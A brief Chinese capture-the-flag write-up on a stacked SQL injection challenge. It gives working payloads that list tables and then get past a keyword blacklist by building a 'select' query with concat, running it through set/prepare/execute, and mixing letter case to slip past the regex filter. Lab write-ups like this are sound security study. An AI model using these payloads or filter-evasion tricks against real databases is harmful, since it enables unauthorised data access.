拿到题目随便输一个
试试union select,出现了黑名单
拉黑了/select|update|delete|drop|insert|where|
用堆叠注入看';show tables;#有什么表
这里尝试使用预编译注入
payload:1%27;set @sql = concat('se','lect * from `1919810931114514`;');prepare stmt from @sql;execute stmt;#
- 我的大致理解
- 用concat将语句连接起来然后赋值给@sql,用set设置
- 然后把@sql准备给stmt
- 最后用execute执行stmt
这里对set和prepare进行了过滤,尝试大小写绕过
payload:1%27;sEt @sql = concat('se','lect * from `1919810931114514`;');prEpare stmt from @sql;execute stmt;#(随便哪个字母大小写都行,主要是让它和正则不匹配)
获得flag